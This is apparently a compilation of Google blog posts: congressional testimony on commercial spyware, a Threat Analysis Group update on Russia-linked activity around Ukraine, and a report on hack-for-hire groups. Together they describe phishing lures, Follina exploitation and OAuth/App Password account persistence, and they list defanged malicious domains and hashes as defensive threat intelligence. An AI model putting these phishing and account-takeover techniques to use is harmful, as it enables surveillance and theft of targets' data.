In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet. While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised. This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.

The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends. This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.

Google’s work to protect users

Across all Google products, we incorporate industry-leading security features and protections to keep our users safe. On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm. Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files. Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.

On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam. Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures. We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source. And we offer other advanced phishing and malware protection to administrators to better protect their users. By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder. However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.

For Android, through its entire development lifecycle, we subject the products to a rigorous security program. The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources. We ensure appropriate controls are built into the architecture of the system. During the development stage, Android-created and open source components are subject to vigorous security reviews For users, Android provides safety and control over how apps and third parties can access the data from their devices. For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.

We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands. For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.

Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents. Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms. We also provide research grants to security researchers to help fund and support the research community. This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure. Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.

Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools. Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites. We recently expanded eligibility to protect Ukraine government organizations, and we are currently protecting over 200 Ukraine websites today. To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security. APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.

Whole of Society response necessary to tackle spyware

We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret. The first step is to understand the scope of the problem. We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors. The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry. The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.

We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions. Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment. The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.

Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry. Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.

Google is investing heavily as a company and as an industry to counter serious threats to our users. In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits. While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries. Google is committed to leading the industry in detecting and disrupting these threats.

I thank the Committee for this attention on this critical issue.

Source: The Official Google Blog

Google’s efforts to identify and counter spyware

The following testimony was delivered to the U.S. House Intelligence Committeeby Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022.

Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee:

Our expert teams

Our ongoing work

Risks posed by commercial spyware are increasing

Google’s work to protect users

Whole of Society response necessary to tackle spyware

I thank the Committee for this attention on this critical issue.

Source: The Official Google Blog

Continued cyber activity in Eastern Europe observed by TAG

Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine. Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same. TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.

Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin. Most of these coordinated influence operations are Russian language efforts aimed at ensuring domestic support in Russia for the war.

Here is a deeper look at some campaign activity TAG has observed since our last update:

Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment. This is the first known instance of Turla distributing Android-related malware. The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services. We believe there was no major impact on Android users and that the number of installs was miniscule.

The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites. However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective. The list of target websites for the app can be seen in the CyberChef recipe here.

Turla website disseminating fake DoS Android Apps.

During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites. In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website stopwar.pro. This app is quite different from the Turla apps described above and written by a different developer. It also downloads a list of targets from an external site, but unlike the Turla apps, it continually sends requests to the target websites until it is stopped by the user.

Pro-Ukrainian website used for disseminating StopWar.apk.

Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.

Indicators:

https://cyberazov[.]com/apk/CyberAzov.apk
745e8c90a8e76f81021ff491cbc275bc134cdd7d23826b8dd23e58297fd0dd33
3c62b24594ec3cacc14bdca068a0277e855967210e92c2c17bcf7c7d0d6b782a

The Follina vulnerability (CVE-2022-30190), first disclosed in late May, received significant usage from both APT and cybercrime groups throughout June after it was patched by Microsoft. Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).

Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability. The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.

TAG has also observed an increasing number of financially motivated actors targeting Ukraine. One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine. We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.

Ghostwriter/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users. They continue to use the 'Browser in the Browser' phishing technique that TAG first observed and described in March. An example of this technique, used to target Facebook users, can be seen in the screenshot below.

An image of a technique used to target Facebook users

An example of this technique used to target Facebook users

COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists. In addition to including phishing links directly in the email, the attackers also link to PDFs and/or DOCs, hosted on Google Drive and Microsoft One Drive, that contain a link to an attacker-controlled phishing domain. In at least one case, unrelated to Ukraine, they have leaked information from a compromised account.

These phishing domains have been blocked through Google Safe Browsing – a service that identifies unsafe websites across the web and notifies users and website owners of potential harm.

Example of a recent COLDRIVER phishing lure

Recently observed COLDRIVER indicators:

7b95747eeea196c1485d089fa47a06bacb07d06399603d3a4fa153c21ce0a9ba
cache-pdf[.]com

In another campaign tracked by CERT-UA as UAC-0056 we observed compromised email addresses of a Regional Prosecutor’s office of Ukraine leveraged to send malicious Microsoft Excel documents with VBA macros delivering Cobalt Strike. In just two days, the volume observed and categorized as spam by Gmail exceeded 4,500 emails. Email contents vary from COVID-19 vaccine policy to the humanitarian crisis in Ukraine.

Source: The Keyword

Countering hack-for-hire groups

As part of TAG's mission to counter serious threats to Google and our users, we've published analysis on a range of persistent threats including government-backed attackers, commercial surveillance vendors, and serious criminal operators. Today, we're sharing intelligence on a segment of attackers we call hack-for-hire, whose niche focuses on compromising accounts and exfiltrating data as a service.

In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves. They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns. Both, however, enable attacks by those who would otherwise lack the capabilities to do so.

We have seen hack-for-hire groups target human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk. They also conduct corporate espionage, handily obscuring their clients’ role.

To help users and defenders, we will provide examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates and context around their capabilities and persistence mechanisms.

How Hack-For-Hire Operations Work

The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients. Some hack-for-hire attackers openly advertise their products and services to anyone willing to pay, while others operate more discreetly selling to a limited audience.

For example, TAG has observed Indian hack-for-hire firms work with third party private investigative services — intermediaries that reach out for services when a client requires them — and provide data exfiltrated from a successful operation. This is detailed in depth in today’s Reuters investigation into the Indian hack-for-hire ecosystem. We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.

The breadth of targets in hack-for-hire campaigns stands in contrast to many government-backed operations, which often have a clearer delineation of mission and targets. A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.

Recent Hack-for-Hire Campaigns

India

Since 2012, TAG has been tracking an interwoven set of Indian hack-for-hire actors, with many having previously worked for Indian offensive security providers Appin and Belltrox.

One cluster of this activity frequently targets government, healthcare, and telecom sectors in Saudi Arabia, the United Arab Emirates, and Bahrain with credential phishing campaigns. These credential phishing campaigns have ranged from targeting specific government organizations to AWS accounts to Gmail accounts.

Sample AWS phishing email

Sample AWS phishing page

TAG has linked former employees of both Appin and Belltrox to Rebsec, a new firm that openly advertises corporate espionage as an offering on its company website.

Rebsec’s offerings as per the company’s website

Russia

While investigating a 2017 credential phishing campaign that targeted a prominent Russian anti-corruption journalist, we discovered the Russian attacker targeting other journalists, politicians across Europe, and various NGOs and non-profit organizations. But what stuck out during this investigation was the breadth of targeting, which also included individuals that had no affiliation with the selected organizations, and appeared to be regular, everyday citizens in Russia and surrounding countries. This hack-for-hire actor has been publicly referred to as 'Void Balaur'.

These campaigns were similar regardless of target, consisting of a credential phishing email with a link to an attacker-controlled phishing page. The lures ranged from fake Gmail and other webmail provider notifications to messages spoofing Russian government organizations. After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP. Both OAuth tokens and App Passwords are revoked when a user changes their password.

Russian hack-for-hire phishing email

Russian hack-for-hire phishing site

During our early investigation, TAG discovered the attacker’s public website (no longer available) advertising account hacking capabilities for email and social media services. The site claimed to have received positive reviews on Russian underground forums such as Dublikat and Probiv.cc. Over the past five years, TAG has observed the group targeting accounts at major webmail providers like Gmail, Hotmail, and Yahoo! and regional webmail providers like abv.bg, mail.ru, inbox.lv, and UKR.net.

Pricing list from hacknet-service.com in 2018

United Arab Emirates

TAG is also tracking a hack-for-hire group now based in the United Arab Emirates that is mostly active in the Middle East and North Africa. They have primarily targeted government, education, and political organizations including Middle East focused NGOs in Europe and the Palestinian political party Fatah. Amnesty International has also reported on their campaigns.

The group commonly uses Google or OWA password reset lures to steal credentials from targets, often using the MailJet or SendGrid API to send phishing emails. Unlike many hack-for-hire actors that use open source phishing frameworks like Evilginx or GoPhish, this group uses a custom phishing kit that utilizes Selenium, a self described 'suite of tools for automating web browsers.' Previously described by Amnesty, this phishing kit has remained under active development over the past five years.

Google Security Alert phishing page

After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. The attacker would then use a custom tool to download the mailbox contents via IMAP.

This group also has links to the original developers of H-Worm, also known as njRAT. In 2014, Microsoft filed a civil suit against the developer, Mohammed Benabdellah, for the development and dissemination of H-Worm. Benabdellah, who also goes by the moniker Houdini, has been actively involved in the day-to-day development and operational deployment of the credential phishing capabilities used by this group since its inception.

Protecting Our Users

As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products. Upon discovery, all identified websites and domains were added to Safe Browsing to protect users from further harm. We encourage any high risk user to enable Advanced Protection and Google Account Level Enhanced Safe Browsing and ensure that all devices are updated. Additionally, our CyberCrime Investigation Group is sharing relevant details and indicators with law enforcement.

TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted. We hope that improved understanding of the tactics and techniques will enhance threat hunting capability and lead to stronger user protections across the industry.

With contributions from Winnona DeSombre

Indicators of Compromise

UAE hack-for-hire Group Domains:

myproject-login[.]shop
mysite-log[.]shop
supp-help[.]me
account-noreply3[.]xyz
goolge[.]ltd
goolge[.]help
account-noreply8[.]info
account-server[.]xyz
kcynvd-mail[.]com
mail-goolge[.]com
kcynve-mail[.]com

Indian hack-for-hire Group Domains:

dtiwa.app[.]link
share-team.app[.]link
mipim.app[.]link
processs.app[.]link
aws-amazon.app[.]ink
clik[.]sbs
loading[.]sbs
userprofile[.]live
requestservice[.]live
unt-log[.]com
webtech-portal[.]com
id-apl[.]info
rnanage-icloud[.]com
apl[.]onl
go-gl[.]io

Russian hack-for-hire Group Domains:

login-my-oauth-mail[.]ru
oauth-login-accounts-mail[.]ru
my-oauth-accounts-mail[.]ru
login-cloud-myaccount-mail[.]ru
myaccounts-auth[.]ru
security-my-account[.]ru
source-place-preference[.]ru
safe-place-smartlink[.]ru
safe-place-experience[.]ru
preference-community-place[.]ru